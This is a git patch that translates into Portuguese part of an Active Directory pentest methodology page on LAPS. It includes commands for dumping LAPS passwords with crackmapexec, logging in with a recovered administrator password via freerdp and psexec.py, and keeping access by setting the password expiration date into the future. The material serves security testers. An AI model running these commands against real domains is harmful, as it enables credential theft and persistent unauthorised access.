From d39a5ea047dc0e092164c6e0abc4ce82898e62d1 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 12 Aug 2024 13:13:08 +0000 Subject: [PATCH] Translated ['windows-hardening/active-directory-methodology/laps.md'] to --- .../active-directory-methodology/laps.md | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/windows-hardening/active-directory-methodology/laps.md b/windows-hardening/active-directory-methodology/laps.md index a9039e568..e796144bf 100644 --- a/windows-hardening/active-directory-methodology/laps.md +++ b/windows-hardening/active-directory-methodology/laps.md @@ -100,18 +100,26 @@ ComputerName Password Expiration ------------ -------- ---------- DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41 ``` -## **Dumping LAPS Passwords With Crackmapexec** +## **Dumpando Senhas LAPS Com Crackmapexec** Se não houver acesso a um powershell, você pode abusar desse privilégio remotamente através do LDAP usando ``` crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps ``` Isso irá despejar todas as senhas que o usuário pode ler, permitindo que você obtenha uma melhor posição com um usuário diferente. +## ** Usando a Senha LAPS ** +``` +freerdp /v:192.168.1.1:3389 /u:Administrator +Password: 2Z@Ae)7!{9#Cq + +python psexec.py Administrator@web.example.com +Password: 2Z@Ae)7!{9#Cq +``` ## **Persistência do LAPS** ### **Data de Expiração** -Uma vez administrador, é possível **obter as senhas** e **impedir** que uma máquina **atualize** sua **senha** definindo a **data de expiração no futuro**. +Uma vez administrador, é possível **obter as senhas** e **prevenir** que uma máquina **atualize** sua **senha** definindo a **data de expiração para o futuro**. ```powershell # Get expiration time Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime